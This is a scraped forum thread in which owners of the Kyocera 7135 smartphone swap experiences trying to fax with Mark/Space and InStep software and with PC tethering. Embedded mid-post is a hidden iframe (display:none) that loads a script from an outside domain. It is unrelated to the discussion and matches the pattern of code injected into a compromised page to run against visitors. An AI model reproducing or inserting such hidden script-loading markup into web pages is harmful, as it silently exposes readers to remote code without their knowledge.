    mark/space fax

Has anyone got this to work on the 7135?

I keep locking up my 7135 with this program.

I have even went to the web and downloaded and reinstalled.

There is no 7135 dropdown choice in the modem set up..<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

well thats why it doesnt work. they probably need to make a patch for the 7135.

the fax program does not work on the i330 either, but works on the i300. send him an email stating this. hopefully it wont take much to fix.

    anyone faxing?

Have you got the 7135 to send/receive faxes? Is this really possible?

I like faxing out as an option when you need to print something desperately. Fax machines are like mobile printers

    Can it work? Does it?

Yes, teathered to a PC it works great as a fax modem, however CDMA faxing more than 2-3 pages can become unstable I hear.

I even think there are fax apps for wireless Palms as well that may work, although I have never looked into it.

    FAXING

I still have not been able to get the fax app mark/space to work even though it came with the phone.

    What about anyone else.

    7135 faxing?

    Hello all,

Im a long time browser of this awsome forum and this is my first post.

I have been DROOLING over this phone ever since I saw a tiny picture of it in the back pages of an October ( I think ) Time magazine article.

I've searched the site and did not find my aswer...

does the 7135 fax by itself without connecting it to a pc?

I'm interested in carrying the 7135 in the field and faxing my customers a form produced with a palm application.

mark/space fax does this, but as of yet it is not compatible with the 7135. if anyone in the san diego aread can lend him your 7135, he will write a patch for it...

but by itself the 7135 cant do this...

I am not sure that mark/space still exists. I paid to register my version of the fax program (for my 6035) on-line. I have never received an authorization code. Repeated attempts to contact Mark/space have gone unanswered. I suggest that no one actually send this company any money.

    Step by step Fax Instructions

Sounds like this mark/space thing is not a solution, at least not right now.

Does anyone know how to setup the 7135 to fax <b>today</b>?

If so, please post clear step-by-step instructions on how to do either of the following:

    1) Fax directly from the phone (like from Docs2Go, that would be great!)

    2) Fax from the PC (as a starting point, a fax-printer driver for Win XP would be a good start to fax from Word, etc...)

Don't know about faxing from the phone itself, but the modem driver is a fax/modem driver, so when connected to a PC, just start the Fax/modem application, then use your favorite fax software. Works fine.

Does Mark/Space allow you to use the software for a limited time without an auth code? Does it work? :biglaughc

This could prove quite costly. We need a stand alone solution, without involving additional monthly charges.

    InStep Fax on 7135?

I used the InStep Fax/Print programs on my old 6035 with excellent results. However, when I tried the same on my 7135, the program can't open the modem port. The 6035 and 7135 both have the data/fax program on it and I never had to open this on the 6035. Am I missing something? Is anyone else using this software successfully? Is there a 7135 fax modem initialization string I'm not aware of?

mark/space fax worked wonderfully with the i300 (and 6035 for that matter), but it wont work for the '330. different init strings for the modem. this is probably the same issue with this particular program...
